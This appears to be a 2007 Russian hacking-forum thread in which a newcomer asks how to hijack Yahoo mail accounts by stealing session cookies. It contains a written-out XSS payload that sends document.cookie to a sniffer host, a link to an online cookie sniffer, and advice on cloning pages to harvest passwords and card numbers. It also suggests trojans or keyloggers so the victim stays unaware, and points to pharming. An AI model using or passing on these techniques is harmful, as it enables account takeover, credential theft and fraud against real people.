Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
13.03.2007, 04:09
|
|
Новичок
Регистрация: 12.03.2007
Сообщений: 4
Провел на форуме:
31475
Репутация:
0
|
|
взлом yahoo.com
Доброе время суток.
Сразу говорю я новенький. 
В поиске не нашол подобной инфы. Про xss прочитал. Видео тожи смотрел о подмене кукав. Вот решил на yahoo.com по тестить.
В общем с моих тестов я увидел:
- Если хтмл страницу выслать то в веб интерфейся она сразу открывается (и скрипты выполняются)  , тоесть не надо сначало скачивать ее на хард.
Теперь я ищу online снифер который ворует куки, чтоб потом свои заменить на жертвы.
- Как я еще заметил куки (или сесия) весит 12 часов. Тоесть если зайти на почту зделать дисконект с инетом и опять соединиться (при этом остоваясь в веб интерфейсе почты) то сесия продолжается и нет не кокого повторного ре логина 
Теперь вопрос пройдет ли с куками такая ситуация? 
И как мне стащить куки ? (Античатовский не хочет работать) |
|
|
13.03.2007, 04:17
|
|
Banned
Регистрация: 18.06.2006
Сообщений: 38
Провел на форуме:
176960
Репутация:
-10
|
|
Сообщение от venix
Теперь вопрос пройдет ли с куками такая ситуация?
И как мне стащить куки ? (Античатовский не хочет работать) Ситуация с куками по идее должна пройти, если сессия не устареет после захода жертвы в свой ящик..
Ищи в инете или ставь свой на своем сайте
Последний раз редактировалось MINDFLY; 13.03.2007 в 04:21..
|
|
|
|
13.03.2007, 11:14
|
|
Новичок
Регистрация: 10.01.2007
Сообщений: 9
Провел на форуме:
52214
Репутация:
22
|
|
http://tools.tehnofil.ru/ ---- снифер вот здезь
|
|
|
|
13.03.2007, 11:48
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286
Репутация:
187
|
|
Сто раз уже это было описанно! типа копируешь страницу себе на сайт и редирект на нее устанавливаешь. Тогда так лохов богатых разводили на стильных шопах, юзер заходит на страницу, и вводит пароль\логин\номер креды (когда-то он должен его ввести - всегда будет вводить) а все это дерьмо ввиде паролей переходит на скрипт который запишет данные в фаил
Если хтмл страницу выслать то в веб интерфейся она сразу открывается (и скрипты выполняются) , тоесть не надо сначала скачивать ее на хард.
если скрипт выполняется значит ты уже скачал в память страницу и код выполнился в в твоем браузере |
|
|
|
13.03.2007, 12:13
|
|
Новичок
Регистрация: 10.01.2007
Сообщений: 9
Провел на форуме:
52214
Репутация:
22
|
|
А ты уверен что на УаНе нет фильтра на скрипты
|
|
|
|
13.03.2007, 12:49
|
|
Новичок
Регистрация: 12.03.2007
Сообщений: 4
Провел на форуме:
31475
Репутация:
0
|
|
tak po pariadku(izvenite translitom pishu, ia shas ne doma).
" http://tools.tehnofil.ru/ " eto snifer malo info tianit s cookie, ili ia ploho razobralsia.
"Сто раз уже это было описанно! типа копируешь страницу себе на сайт и редирект на нее устанавливаешь.
Тогда так лохов богатых разводили на стильных шопах, юзер заходит на страницу, и вводит пароль\логин\номер
креды (когда-то он должен его ввести - всегда будет вводить) а все это дерьмо ввиде паролей переходит на скрипт
который запишет данные в фаил"
Mozhno i Trojana brosit ili keylogger chob zapisival. Nado 4tob zhertva ne znala chto ee imeyut.
"если скрипт выполняется значит ты уже скачал в память страницу и код выполнился в в твоем браузере"
imelos drugoe, esli ti otpravil html stranicu v pisme to ona automatom otkroetsia, a ne nado nazhimat otkrit
file. Chto oblegchaet rabotu.
"А ты уверен что на УаНе нет фильтра на скрипты"
tegi ne filtruiutsia. Ia vchera zapihival snifer v telo html stranici, i vse prekrasno rabotalo
toest nado podhodiashi sniffer. Eh poidu regit site dlia sniffera.
Последний раз редактировалось venix; 13.03.2007 в 12:58..
|
|
|
|
14.03.2007, 01:31
|
|
Новичок
Регистрация: 12.03.2007
Сообщений: 4
Провел на форуме:
31475
Репутация:
0
|
|
перепробывал уйму сниферов, но все без результата. Можит я что то не так делаю ?  Xss как я понемаю заставить человека (по своей или не своей воле) перейти на картинку с снифферам. Я делаю так : создаю хтмл страницу в нее пихаю < script >img = new Image(); img. src = "адресс к снифферу"+escape(document.cookie); </ script>
пробелы специально поставали. Потом отпровляю на адрес адрес@yahoo.com и в браузере открываю писмо. В писме автоматом открывается вложиная хтмл страница и по идеи запускаються скрипты и теги. Но вот я не пойму почему куки не утегиваются ? Если кто сталкивался с стакой проблемай то расскажите как ее решить.
З.ы.
Щас еще проверил с подменой куков, то на yahoo эта фишка работает. |
|
|
|
14.03.2007, 04:27
|
|
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614
Репутация:
1223
|
|
Фарминг сейчас самый актуальный способ, почитай в теме разоблочение в важных.
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
